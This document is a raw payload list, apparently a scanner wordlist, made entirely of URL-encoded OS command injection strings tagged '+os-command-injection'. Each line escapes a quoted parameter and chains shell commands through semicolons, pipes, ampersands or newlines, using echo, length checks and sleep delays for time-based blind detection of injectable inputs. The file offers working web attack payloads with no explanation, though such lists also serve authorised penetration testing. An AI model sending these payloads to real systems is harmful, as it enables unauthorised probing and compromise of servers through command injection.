+os-command-injection,'%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%22%7C%20%5B%201%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%22%7C%20%5B%202%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%22%7C%20%5B%203%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%22%7C%20%5B%204%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%22%7C%20%5B%205%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%22%7C%20%5B%206%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%22%7C%20%5B%207%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%22%7C%20%5B%208%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%22%7C%20%5B%209%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%22%7C%20%5B%201%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%22%7C%20%5B%202%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%22%7C%20%5B%203%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%22%7C%20%5B%204%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%22%7C%20%5B%205%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%22%7C%20%5B%206%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%22%7C%20%5B%207%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%22%7C%20%5B%208%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%22%7C%20%5B%209%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C' +os-command-injection,'%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26' +os-command-injection,'%22%7C%20%5B%201%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%22%7C%20%5B%202%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%22%7C%20%5B%203%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%22%7C%20%5B%204%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%22%7C%20%5B%205%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%22%7C%20%5B%206%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%22%7C%20%5B%207%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%22%7C%20%5B%208%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%22%7C%20%5B%209%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26' +os-command-injection,'%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26' +os-command-injection,'%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C' +os-command-injection,'%22%7C%20%5B%201%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%22%7C%20%5B%202%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%22%7C%20%5B%203%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%22%7C%20%5B%204%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%22%7C%20%5B%205%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%22%7C%20%5B%206%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%22%7C%20%5B%207%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%22%7C%20%5B%208%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' 